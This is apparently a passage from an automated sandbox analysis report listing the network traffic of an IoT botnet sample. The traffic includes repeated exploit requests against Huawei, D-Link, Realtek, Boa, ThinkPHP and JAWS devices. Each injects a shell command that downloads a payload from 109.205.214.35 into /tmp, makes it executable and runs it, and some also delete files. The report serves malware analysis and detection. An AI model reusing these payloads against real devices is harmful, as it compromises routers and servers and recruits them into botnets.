61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 109.205.214.35 -l /tmp/.matrix -r /mips; /bin/busybox chmod 777 * /tmp/.matrix; /tmp/.matrix)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 3b 20 2f 74 6d 70 2f 2e 6d 61 74 72 69 78 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 109.205.214.35 -l /tmp/.matrix -r /mips; /bin/busybox chmod 777 * /tmp/.matrix; /tmp/.matrix)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asuData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
          Source: unknownTCP traffic detected without corresponding DNS query: 197.152.84.105
          Source: unknownTCP traffic detected without corresponding DNS query: 197.39.237.184
          Source: unknownTCP traffic detected without corresponding DNS query: 197.22.145.17
          Source: unknownTCP traffic detected without corresponding DNS query: 197.47.174.105
          Source: unknownTCP traffic detected without corresponding DNS query: 197.80.13.182
          Source: unknownTCP traffic detected without corresponding DNS query: 197.70.76.247
          Source: unknownTCP traffic detected without corresponding DNS query: 197.225.177.217
          Source: unknownTCP traffic detected without corresponding DNS query: 197.169.91.205
          Source: unknownTCP traffic detected without corresponding DNS query: 197.237.232.26
          Source: unknownTCP traffic detected without corresponding DNS query: 197.231.223.151
          Source: unknownTCP traffic detected without corresponding DNS query: 197.209.80.159
          Source: unknownTCP traffic detected without corresponding DNS query: 197.52.28.184
          Source: unknownTCP traffic detected without corresponding DNS query: 197.21.193.164
          Source: unknownTCP traffic detected without corresponding DNS query: 197.234.137.168
          Source: unknownTCP traffic detected without corresponding DNS query: 197.182.116.8
          Source: unknownTCP traffic detected without corresponding DNS query: 197.232.127.111
          Source: unknownTCP traffic detected without corresponding DNS query: 197.16.149.53
          Source: unknownTCP traffic detected without corresponding DNS query: 197.195.126.87
          Source: unknownTCP traffic detected without corresponding DNS query: 197.175.175.155
          Source: unknownTCP traffic detected without corresponding DNS query: 197.55.109.181
          Source: unknownTCP traffic detected without corresponding DNS query: 197.3.214.88
          Source: unknownTCP traffic detected without corresponding DNS query: 197.16.247.174
          Source: unknownTCP traffic detected without corresponding DNS query: 197.185.97.11
          Source: unknownTCP traffic detected without corresponding DNS query: 197.226.216.17
          Source: unknownTCP traffic detected without corresponding DNS query: 197.149.83.212
          Source: unknownTCP traffic detected without corresponding DNS query: 197.26.42.28
          Source: unknownTCP traffic detected without corresponding DNS query: 197.20.136.69
          Source: unknownTCP traffic detected without corresponding DNS query: 197.151.138.71
          Source: unknownTCP traffic detected without corresponding DNS query: 197.143.47.62
          Source: unknownTCP traffic detected without corresponding DNS query: 197.75.46.39
          Source: unknownTCP traffic detected without corresponding DNS query: 197.241.233.190
          Source: unknownTCP traffic detected without corresponding DNS query: 197.23.9.228
          Source: unknownTCP traffic detected without corresponding DNS query: 197.96.1.210
          Source: unknownTCP traffic detected without corresponding DNS query: 197.81.186.136
          Source: unknownTCP traffic detected without corresponding DNS query: 197.114.215.77
          Source: unknownTCP traffic detected without corresponding DNS query: 197.252.74.228
          Source: unknownTCP traffic detected without corresponding DNS query: 197.25.154.230
          Source: unknownTCP traffic detected without corresponding DNS query: 197.243.246.219
          Source: unknownTCP traffic detected without corresponding DNS query: 197.251.82.174
          Source: unknownTCP traffic detected without corresponding DNS query: 197.123.144.187
          Source: unknownTCP traffic detected without corresponding DNS query: 197.6.160.75
          Source: unknownTCP traffic detected without corresponding DNS query: 197.207.241.201
          Source: unknownTCP traffic detected without corresponding DNS query: 197.114.39.226
          Source: unknownTCP traffic detected without corresponding DNS query: 197.115.83.22
          Source: unknownTCP traffic detected without corresponding DNS query: 197.173.61.232
          Source: unknownTCP traffic detected without corresponding DNS query: 197.178.62.170
          Source: unknownTCP traffic detected without corresponding DNS query: 197.252.165.41
          Source: unknownTCP traffic detected without corresponding DNS query: 197.52.61.216
          Source: unknownTCP traffic detected without corresponding DNS query: 197.16.255.159
          Source: unknownTCP traffic detected without corresponding DNS query: 197.146.199.218
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
